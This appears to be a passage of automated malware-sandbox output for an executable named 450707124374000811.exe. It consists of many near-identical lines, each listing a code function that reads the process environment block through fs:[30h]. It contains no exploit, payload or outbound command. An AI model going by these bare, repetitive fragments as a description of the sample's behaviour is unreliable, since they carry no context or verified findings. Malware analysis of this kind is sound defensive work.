    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359B35BA mov eax, dword ptr fs:[00000030h]4_2_359B35BA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359B35BA mov eax, dword ptr fs:[00000030h]4_2_359B35BA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359B35BA mov eax, dword ptr fs:[00000030h]4_2_359B35BA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359B35BA mov eax, dword ptr fs:[00000030h]4_2_359B35BA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359DF5BE mov eax, dword ptr fs:[00000030h]4_2_359DF5BE
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594F5B0 mov eax, dword ptr fs:[00000030h]4_2_3594F5B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594F5B0 mov eax, dword ptr fs:[00000030h]4_2_3594F5B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594F5B0 mov eax, dword ptr fs:[00000030h]4_2_3594F5B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594F5B0 mov eax, dword ptr fs:[00000030h]4_2_3594F5B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594F5B0 mov eax, dword ptr fs:[00000030h]4_2_3594F5B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594F5B0 mov eax, dword ptr fs:[00000030h]4_2_3594F5B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594F5B0 mov eax, dword ptr fs:[00000030h]4_2_3594F5B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594F5B0 mov eax, dword ptr fs:[00000030h]4_2_3594F5B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594F5B0 mov eax, dword ptr fs:[00000030h]4_2_3594F5B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F35B6 mov eax, dword ptr fs:[00000030h]4_2_359F35B6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359BD5B0 mov eax, dword ptr fs:[00000030h]4_2_359BD5B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359BD5B0 mov eax, dword ptr fs:[00000030h]4_2_359BD5B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359415A9 mov eax, dword ptr fs:[00000030h]4_2_359415A9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359415A9 mov eax, dword ptr fs:[00000030h]4_2_359415A9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359415A9 mov eax, dword ptr fs:[00000030h]4_2_359415A9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359415A9 mov eax, dword ptr fs:[00000030h]4_2_359415A9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359415A9 mov eax, dword ptr fs:[00000030h]4_2_359415A9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F35D7 mov eax, dword ptr fs:[00000030h]4_2_359F35D7
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F35D7 mov eax, dword ptr fs:[00000030h]4_2_359F35D7
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F35D7 mov eax, dword ptr fs:[00000030h]4_2_359F35D7
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3599D5D0 mov eax, dword ptr fs:[00000030h]4_2_3599D5D0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3599D5D0 mov ecx, dword ptr fs:[00000030h]4_2_3599D5D0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359495DA mov eax, dword ptr fs:[00000030h]4_2_359495DA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359555C0 mov eax, dword ptr fs:[00000030h]4_2_359555C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F55C9 mov eax, dword ptr fs:[00000030h]4_2_359F55C9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359415F4 mov eax, dword ptr fs:[00000030h]4_2_359415F4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359415F4 mov eax, dword ptr fs:[00000030h]4_2_359415F4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359415F4 mov eax, dword ptr fs:[00000030h]4_2_359415F4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359415F4 mov eax, dword ptr fs:[00000030h]4_2_359415F4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359415F4 mov eax, dword ptr fs:[00000030h]4_2_359415F4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359415F4 mov eax, dword ptr fs:[00000030h]4_2_359415F4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35957505 mov eax, dword ptr fs:[00000030h]4_2_35957505
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35957505 mov ecx, dword ptr fs:[00000030h]4_2_35957505
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595D530 mov eax, dword ptr fs:[00000030h]4_2_3595D530
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595D530 mov eax, dword ptr fs:[00000030h]4_2_3595D530
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3592D534 mov eax, dword ptr fs:[00000030h]4_2_3592D534
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3592D534 mov eax, dword ptr fs:[00000030h]4_2_3592D534
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3592D534 mov eax, dword ptr fs:[00000030h]4_2_3592D534
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3592D534 mov eax, dword ptr fs:[00000030h]4_2_3592D534
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3592D534 mov eax, dword ptr fs:[00000030h]4_2_3592D534
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3592D534 mov eax, dword ptr fs:[00000030h]4_2_3592D534
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F5537 mov eax, dword ptr fs:[00000030h]4_2_359F5537
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359DB52F mov eax, dword ptr fs:[00000030h]4_2_359DB52F
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CF525 mov eax, dword ptr fs:[00000030h]4_2_359CF525
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CF525 mov eax, dword ptr fs:[00000030h]4_2_359CF525
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CF525 mov eax, dword ptr fs:[00000030h]4_2_359CF525
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CF525 mov eax, dword ptr fs:[00000030h]4_2_359CF525
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CF525 mov eax, dword ptr fs:[00000030h]4_2_359CF525
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CF525 mov eax, dword ptr fs:[00000030h]4_2_359CF525
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CF525 mov eax, dword ptr fs:[00000030h]4_2_359CF525
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CB550 mov eax, dword ptr fs:[00000030h]4_2_359CB550
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CB550 mov eax, dword ptr fs:[00000030h]4_2_359CB550
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CB550 mov eax, dword ptr fs:[00000030h]4_2_359CB550
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595B570 mov eax, dword ptr fs:[00000030h]4_2_3595B570
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595B570 mov eax, dword ptr fs:[00000030h]4_2_3595B570
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591B562 mov eax, dword ptr fs:[00000030h]4_2_3591B562
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591B480 mov eax, dword ptr fs:[00000030h]4_2_3591B480
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35929486 mov eax, dword ptr fs:[00000030h]4_2_35929486
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35929486 mov eax, dword ptr fs:[00000030h]4_2_35929486
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359174B0 mov eax, dword ptr fs:[00000030h]4_2_359174B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359174B0 mov eax, dword ptr fs:[00000030h]4_2_359174B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359534B0 mov eax, dword ptr fs:[00000030h]4_2_359534B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C74B0 mov eax, dword ptr fs:[00000030h]4_2_359C74B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F54DB mov eax, dword ptr fs:[00000030h]4_2_359F54DB
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C94E0 mov eax, dword ptr fs:[00000030h]4_2_359C94E0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359A7410 mov eax, dword ptr fs:[00000030h]4_2_359A7410
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594340D mov eax, dword ptr fs:[00000030h]4_2_3594340D
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CB450 mov eax, dword ptr fs:[00000030h]4_2_359CB450
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CB450 mov eax, dword ptr fs:[00000030h]4_2_359CB450
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CB450 mov eax, dword ptr fs:[00000030h]4_2_359CB450
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CB450 mov eax, dword ptr fs:[00000030h]4_2_359CB450
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359DF453 mov eax, dword ptr fs:[00000030h]4_2_359DF453
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3592B440 mov eax, dword ptr fs:[00000030h]4_2_3592B440
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3592B440 mov eax, dword ptr fs:[00000030h]4_2_3592B440
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3592B440 mov eax, dword ptr fs:[00000030h]4_2_3592B440
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3592B440 mov eax, dword ptr fs:[00000030h]4_2_3592B440
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3592B440 mov eax, dword ptr fs:[00000030h]4_2_3592B440
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3592B440 mov eax, dword ptr fs:[00000030h]4_2_3592B440
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F547F mov eax, dword ptr fs:[00000030h]4_2_359F547F
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35921460 mov eax, dword ptr fs:[00000030h]4_2_35921460
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35921460 mov eax, dword ptr fs:[00000030h]4_2_35921460
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35921460 mov eax, dword ptr fs:[00000030h]4_2_35921460
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35921460 mov eax, dword ptr fs:[00000030h]4_2_35921460
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35921460 mov eax, dword ptr fs:[00000030h]4_2_35921460
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F460 mov eax, dword ptr fs:[00000030h]4_2_3593F460
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F460 mov eax, dword ptr fs:[00000030h]4_2_3593F460
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F460 mov eax, dword ptr fs:[00000030h]4_2_3593F460
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F460 mov eax, dword ptr fs:[00000030h]4_2_3593F460
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F460 mov eax, dword ptr fs:[00000030h]4_2_3593F460
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F460 mov eax, dword ptr fs:[00000030h]4_2_3593F460
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359DF78A mov eax, dword ptr fs:[00000030h]4_2_359DF78A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594D7B0 mov eax, dword ptr fs:[00000030h]4_2_3594D7B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F37B6 mov eax, dword ptr fs:[00000030h]4_2_359F37B6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F7BA mov eax, dword ptr fs:[00000030h]4_2_3591F7BA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F7BA mov eax, dword ptr fs:[00000030h]4_2_3591F7BA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F7BA mov eax, dword ptr fs:[00000030h]4_2_3591F7BA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F7BA mov eax, dword ptr fs:[00000030h]4_2_3591F7BA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F7BA mov eax, dword ptr fs:[00000030h]4_2_3591F7BA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F7BA mov eax, dword ptr fs:[00000030h]4_2_3591F7BA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F7BA mov eax, dword ptr fs:[00000030h]4_2_3591F7BA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F7BA mov eax, dword ptr fs:[00000030h]4_2_3591F7BA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F7BA mov eax, dword ptr fs:[00000030h]4_2_3591F7BA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359DD7B0 mov eax, dword ptr fs:[00000030h]4_2_359DD7B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359DD7B0 mov eax, dword ptr fs:[00000030h]4_2_359DD7B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359A97A9 mov eax, dword ptr fs:[00000030h]4_2_359A97A9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359AF7AF mov eax, dword ptr fs:[00000030h]4_2_359AF7AF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359AF7AF mov eax, dword ptr fs:[00000030h]4_2_359AF7AF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359AF7AF mov eax, dword ptr fs:[00000030h]4_2_359AF7AF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359AF7AF mov eax, dword ptr fs:[00000030h]4_2_359AF7AF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359AF7AF mov eax, dword ptr fs:[00000030h]4_2_359AF7AF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359257C0 mov eax, dword ptr fs:[00000030h]4_2_359257C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359257C0 mov eax, dword ptr fs:[00000030h]4_2_359257C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359257C0 mov eax, dword ptr fs:[00000030h]4_2_359257C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3592D7E0 mov ecx, dword ptr fs:[00000030h]4_2_3592D7E0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595F71F mov eax, dword ptr fs:[00000030h]4_2_3595F71F
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595F71F mov eax, dword ptr fs:[00000030h]4_2_3595F71F
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35925702 mov eax, dword ptr fs:[00000030h]4_2_35925702
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35925702 mov eax, dword ptr fs:[00000030h]4_2_35925702
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35927703 mov eax, dword ptr fs:[00000030h]4_2_35927703
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35919730 mov eax, dword ptr fs:[00000030h]4_2_35919730
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35919730 mov eax, dword ptr fs:[00000030h]4_2_35919730
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35955734 mov eax, dword ptr fs:[00000030h]4_2_35955734
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FB73C mov eax, dword ptr fs:[00000030h]4_2_359FB73C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FB73C mov eax, dword ptr fs:[00000030h]4_2_359FB73C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FB73C mov eax, dword ptr fs:[00000030h]4_2_359FB73C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FB73C mov eax, dword ptr fs:[00000030h]4_2_359FB73C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3592973A mov eax, dword ptr fs:[00000030h]4_2_3592973A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3592973A mov eax, dword ptr fs:[00000030h]4_2_3592973A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35923720 mov eax, dword ptr fs:[00000030h]4_2_35923720
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F720 mov eax, dword ptr fs:[00000030h]4_2_3593F720
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F720 mov eax, dword ptr fs:[00000030h]4_2_3593F720
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F720 mov eax, dword ptr fs:[00000030h]4_2_3593F720
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359DF72E mov eax, dword ptr fs:[00000030h]4_2_359DF72E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E972B mov eax, dword ptr fs:[00000030h]4_2_359E972B
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C375F mov eax, dword ptr fs:[00000030h]4_2_359C375F
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C375F mov eax, dword ptr fs:[00000030h]4_2_359C375F
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C375F mov eax, dword ptr fs:[00000030h]4_2_359C375F
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C375F mov eax, dword ptr fs:[00000030h]4_2_359C375F
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C375F mov eax, dword ptr fs:[00000030h]4_2_359C375F
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35933740 mov eax, dword ptr fs:[00000030h]4_2_35933740
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35933740 mov eax, dword ptr fs:[00000030h]4_2_35933740
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35933740 mov eax, dword ptr fs:[00000030h]4_2_35933740
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F3749 mov eax, dword ptr fs:[00000030h]4_2_359F3749
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591B765 mov eax, dword ptr fs:[00000030h]4_2_3591B765
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591B765 mov eax, dword ptr fs:[00000030h]4_2_3591B765
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591B765 mov eax, dword ptr fs:[00000030h]4_2_3591B765
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591B765 mov eax, dword ptr fs:[00000030h]4_2_3591B765
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359A368C mov eax, dword ptr fs:[00000030h]4_2_359A368C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359A368C mov eax, dword ptr fs:[00000030h]4_2_359A368C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359A368C mov eax, dword ptr fs:[00000030h]4_2_359A368C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359A368C mov eax, dword ptr fs:[00000030h]4_2_359A368C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359176B2 mov eax, dword ptr fs:[00000030h]4_2_359176B2
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359176B2 mov eax, dword ptr fs:[00000030h]4_2_359176B2
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359176B2 mov eax, dword ptr fs:[00000030h]4_2_359176B2
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591D6AA mov eax, dword ptr fs:[00000030h]4_2_3591D6AA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591D6AA mov eax, dword ptr fs:[00000030h]4_2_3591D6AA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3592B6C0 mov eax, dword ptr fs:[00000030h]4_2_3592B6C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3592B6C0 mov eax, dword ptr fs:[00000030h]4_2_3592B6C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3592B6C0 mov eax, dword ptr fs:[00000030h]4_2_3592B6C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3592B6C0 mov eax, dword ptr fs:[00000030h]4_2_3592B6C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3592B6C0 mov eax, dword ptr fs:[00000030h]4_2_3592B6C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3592B6C0 mov eax, dword ptr fs:[00000030h]4_2_3592B6C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E16CC mov eax, dword ptr fs:[00000030h]4_2_359E16CC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E16CC mov eax, dword ptr fs:[00000030h]4_2_359E16CC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E16CC mov eax, dword ptr fs:[00000030h]4_2_359E16CC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E16CC mov eax, dword ptr fs:[00000030h]4_2_359E16CC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359DF6C7 mov eax, dword ptr fs:[00000030h]4_2_359DF6C7
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359516CF mov eax, dword ptr fs:[00000030h]4_2_359516CF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359DD6F0 mov eax, dword ptr fs:[00000030h]4_2_359DD6F0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594D6E0 mov eax, dword ptr fs:[00000030h]4_2_3594D6E0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594D6E0 mov eax, dword ptr fs:[00000030h]4_2_3594D6E0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359B36EE mov eax, dword ptr fs:[00000030h]4_2_359B36EE
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359B36EE mov eax, dword ptr fs:[00000030h]4_2_359B36EE
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359B36EE mov eax, dword ptr fs:[00000030h]4_2_359B36EE
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359B36EE mov eax, dword ptr fs:[00000030h]4_2_359B36EE
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359B36EE mov eax, dword ptr fs:[00000030h]4_2_359B36EE
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359B36EE mov eax, dword ptr fs:[00000030h]4_2_359B36EE
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35923616 mov eax, dword ptr fs:[00000030h]4_2_35923616
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35923616 mov eax, dword ptr fs:[00000030h]4_2_35923616
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35951607 mov eax, dword ptr fs:[00000030h]4_2_35951607
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595F603 mov eax, dword ptr fs:[00000030h]4_2_3595F603
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F5636 mov eax, dword ptr fs:[00000030h]4_2_359F5636
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F626 mov eax, dword ptr fs:[00000030h]4_2_3591F626
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F626 mov eax, dword ptr fs:[00000030h]4_2_3591F626
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F626 mov eax, dword ptr fs:[00000030h]4_2_3591F626
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F626 mov eax, dword ptr fs:[00000030h]4_2_3591F626
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F626 mov eax, dword ptr fs:[00000030h]4_2_3591F626
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F626 mov eax, dword ptr fs:[00000030h]4_2_3591F626
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F626 mov eax, dword ptr fs:[00000030h]4_2_3591F626
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F626 mov eax, dword ptr fs:[00000030h]4_2_3591F626
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F626 mov eax, dword ptr fs:[00000030h]4_2_3591F626
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35959660 mov eax, dword ptr fs:[00000030h]4_2_35959660
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35959660 mov eax, dword ptr fs:[00000030h]4_2_35959660
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359BD660 mov eax, dword ptr fs:[00000030h]4_2_359BD660
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35977190 mov eax, dword ptr fs:[00000030h]4_2_35977190
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D5180 mov eax, dword ptr fs:[00000030h]4_2_359D5180
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D5180 mov eax, dword ptr fs:[00000030h]4_2_359D5180
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593B1B0 mov eax, dword ptr fs:[00000030h]4_2_3593B1B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D11A4 mov eax, dword ptr fs:[00000030h]4_2_359D11A4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D11A4 mov eax, dword ptr fs:[00000030h]4_2_359D11A4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D11A4 mov eax, dword ptr fs:[00000030h]4_2_359D11A4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D11A4 mov eax, dword ptr fs:[00000030h]4_2_359D11A4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595D1D0 mov eax, dword ptr fs:[00000030h]4_2_3595D1D0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595D1D0 mov ecx, dword ptr fs:[00000030h]4_2_3595D1D0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F51CB mov eax, dword ptr fs:[00000030h]4_2_359F51CB
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C71F9 mov esi, dword ptr fs:[00000030h]4_2_359C71F9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359451EF mov eax, dword ptr fs:[00000030h]4_2_359451EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359451EF mov eax, dword ptr fs:[00000030h]4_2_359451EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359451EF mov eax, dword ptr fs:[00000030h]4_2_359451EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359451EF mov eax, dword ptr fs:[00000030h]4_2_359451EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359451EF mov eax, dword ptr fs:[00000030h]4_2_359451EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359451EF mov eax, dword ptr fs:[00000030h]4_2_359451EF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359451EF mov eax, dword ptr fs:[00000030h]4_2_359451EF
